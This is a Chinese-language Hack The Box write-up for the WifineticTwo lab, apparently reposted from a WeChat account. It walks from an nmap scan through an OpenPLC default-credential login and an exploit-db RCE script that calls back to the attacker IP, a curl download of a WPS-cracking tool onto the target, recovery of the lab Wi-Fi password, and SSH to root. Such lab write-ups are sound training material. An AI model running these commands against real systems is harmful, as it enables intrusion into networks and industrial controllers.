扫描靶机
nmap -sC -sV -T4 -Pn 10.129.130.13
扫描到了8080端口,先看一下
直接定向到了openPLC界面,这是一个openPLC系统,直接网上搜素默认密码尝试登陆
成功登陆进去了
然后搜索该系统的漏洞,直接在exploitdb搜索
可以看到可以利用49803.py的poc脚本来进行,复制下来,然后修改一下内容,根据他的控制面板修改内容
现在可以直接运行命令
python3 49803.py -u http://wifinetictwo.htb:8080/ -l openplc -p openplc -i 10.10.14.6 -r 1234
还以为拿到了root flag,结果是user,猜测是在docker里面,查看ip的时候可以发现wlan0接口
wlan0接口是WIFI接口,可以使用OneShot 工具测试该无线的wps漏洞
https://github.com/nikita-yfh/OneShot-C/tree/master
先上传到目标主机,使用curl命令下载文件(在arm架构下make出来的是无法运行的)
curl -O http://10.10.14.6/oneshot
然后使用该工具进行攻击
./oneshot -i wlan0 -K
成功博捕捉到了密码NoWWEDoKnowWhaTisReal123!,前提是配置好无线服务https://wiki.somlabs.com/index.php/Connecting_to_WiFi_network_using_systemd_and_wpa-supplicant
配置完成后,重启服务
systemctl enable wpa_supplicant@wlan0.servicesystemctl restart systemd-networkd.servicesystemctl restart wpa_supplicant@wlan0.service
然后查看一下wlan0端口,成功连接了其他网段
直接使用ssh连接192.168.1.1,拿到root flag
25-wlan.network
[Match]Name=wlan0[Network]DHCP=ipv4
wpa_supplicant-wlan0.conf
ctrl_interface=/var/run/wpa_supplicantctrl_interface_group=0update_config=1network={ssid="plcrouter"psk="NoWWEDoKnowWhaTisReal123!"key_mgmt=WPA-PSKproto=WPA2pairwise=CCMP TKIPgroup=CCMP TKIPscan_ssid=1}
原文始发于微信公众号(Jiyou too beautiful):HTB-WifineticTwo笔记
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论